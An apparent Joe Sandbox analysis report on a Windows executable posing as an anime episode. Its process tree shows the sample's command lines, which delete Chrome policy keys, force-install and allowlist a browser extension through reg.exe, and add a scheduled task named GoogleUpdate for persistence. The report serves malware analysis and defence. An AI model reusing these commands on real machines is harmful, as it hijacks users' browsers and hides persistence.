Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Boku no Hero Academia 6th Season - Episode 13.exe

Overview

General Information

Sample Name:Boku no Hero Academia 6th Season - Episode 13.exe
Analysis ID:776910
MD5:71eabe2172181c2e4517c30c22cb6d12
SHA1:caaa052ae05d6032d8361e61fa22a686c6b5a392
SHA256:147e1b5a750fbfd8863449d523e3d6d110defceb74ad9cdb7c939ab75ffa2180
Infos:

Detection

Score:26
Range:0 - 100
Whitelisted:false
Confidence:0%

Compliance

Score:36
Range:0 - 100

Signatures

Uses cmd line tools excessively to alter registry or file data
Obfuscated command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates processes with suspicious names
Found dropped PE file which has not been started or loaded
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Is looking for software installed on the system
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample searches for specific file, try point organization specific fake files to the analysis machine

Process Tree

  • System is w10x64
  • Boku no Hero Academia 6th Season - Episode 13.exe (PID: 5216 cmdline: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe MD5: 71EABE2172181C2E4517C30C22CB6D12)
    • Boku no Hero Academia 6th Season - Episode 13.tmp (PID: 5512 cmdline: "C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$30408,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" MD5: F16A37D7AF3DB8C75F19AF9B3453D9C8)
      • Boku no Hero Academia 6th Season - Episode 13.exe (PID: 5204 cmdline: "C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT MD5: 71EABE2172181C2E4517C30C22CB6D12)
        • Boku no Hero Academia 6th Season - Episode 13.tmp (PID: 2632 cmdline: "C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$2040C,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT MD5: F16A37D7AF3DB8C75F19AF9B3453D9C8)
          • VC_redist.x64.exe (PID: 1972 cmdline: "C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" /install /quiet MD5: 703BD677778F2A1BA1EB4338BAC3B868)
            • VC_redist.x64.exe (PID: 5372 cmdline: "C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=628 /install /quiet MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
              • VC_redist.x64.exe (PID: 5468 cmdline: "C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{E9871BE9-995B-4EFF-BA27-126D1FC36700} {ED4F63C9-39F6-4A7D-A76D-4B8F059F42ED} 5372 MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
                • VC_redist.x64.exe (PID: 5280 cmdline: "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468 MD5: CAA6E1DCAE648CE17BC57A5B7D383CC8)
                  • VC_redist.x64.exe (PID: 2140 cmdline: "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468 MD5: CAA6E1DCAE648CE17BC57A5B7D383CC8)
                    • VC_redist.x64.exe (PID: 4548 cmdline: "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{DC57C196-DCD2-4148-818F-F83AAF0E5C46} {63FE371D-956D-4D2B-988F-00929D1EE668} 2140 MD5: CAA6E1DCAE648CE17BC57A5B7D383CC8)
          • InstallExtension.exe (PID: 1580 cmdline: "C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe" install MD5: 6B435C6EA00DA06603EA9927D489AB6A)
            • cmd.exe (PID: 5816 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • schtasks.exe (PID: 5912 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • cmd.exe (PID: 5928 cmdline: C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\WindowsApp\reg.bat" install MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • schtasks.exe (PID: 6036 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • msiexec.exe (PID: 1092 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
  • VC_redist.x64.exe (PID: 1272 cmdline: "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /burn.runonce MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
    • VC_redist.x64.exe (PID: 4668 cmdline: "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
      • VC_redist.x64.exe (PID: 3732 cmdline: "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
        • VC_redist.x64.exe (PID: 1324 cmdline: "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{9F679354-B01C-4132-8C3B-9D0B8BAD9686} {7ADE5D70-631D-453D-B602-70E5C1B36EAF} 3732 MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
          • VC_redist.x64.exe (PID: 4544 cmdline: "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324 MD5: CAA6E1DCAE648CE17BC57A5B7D383CC8)
            • VC_redist.x64.exe (PID: 4008 cmdline: "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324 MD5: CAA6E1DCAE648CE17BC57A5B7D383CC8)
  • InstallExtension.exe (PID: 5852 cmdline: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe MD5: 6B435C6EA00DA06603EA9927D489AB6A)
    • cmd.exe (PID: 6092 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 5392 cmdline: REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 4396 cmdline: REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5428 cmdline: REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5416 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d dbffglanhdhedkjkijpkplhpcdndpchj /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 2040 cmdline: REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\WindowsApp\apps-helper\apps.crx" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 4528 cmdline: REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "version" /t REG_SZ /d 1.0 /f MD5: E3DACF0B31841FA02064B4457D44B357)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00029EB7 DecryptFileW,4_2_00029EB7
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004F961 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,4_2_0004F961
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00029C99 DecryptFileW,DecryptFileW,4_2_00029C99
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000C9EB7 DecryptFileW,5_2_000C9EB7
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000EF961 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,5_2_000EF961
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000C9C99 DecryptFileW,DecryptFileW,5_2_000C9C99
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: PROPSYS.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: SspiCli.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: MSVCP140.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: iertutil.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: VCRUNTIME140_1.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: urlmon.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: CRYPTBASE.DLL
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: VCRUNTIME140.dll

Compliance

barindex
Uses 32bit PE files
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: PROPSYS.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: SspiCli.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: MSVCP140.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: iertutil.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: VCRUNTIME140_1.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: urlmon.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: CRYPTBASE.DLL
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeDLL: VCRUNTIME140.dll
Creates a software restore point
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore SRInitDoneJump to behavior
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore SRInitDone
Creates license or readme file
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1028\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1029\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1031\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1036\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1040\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1041\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1042\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1045\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1046\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1049\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1055\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\2052\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\3082\license.rtfJump to behavior
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1028\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1029\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1031\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1036\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1040\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1041\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1042\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1045\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1046\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1049\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1055\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\2052\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\3082\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1028\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1029\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1031\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1036\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1040\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1041\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1042\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1045\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1046\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1049\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1055\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\2052\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\3082\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1028\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1029\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1031\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1036\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1040\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1041\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1042\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1045\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1046\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1049\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1055\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\2052\license.rtf
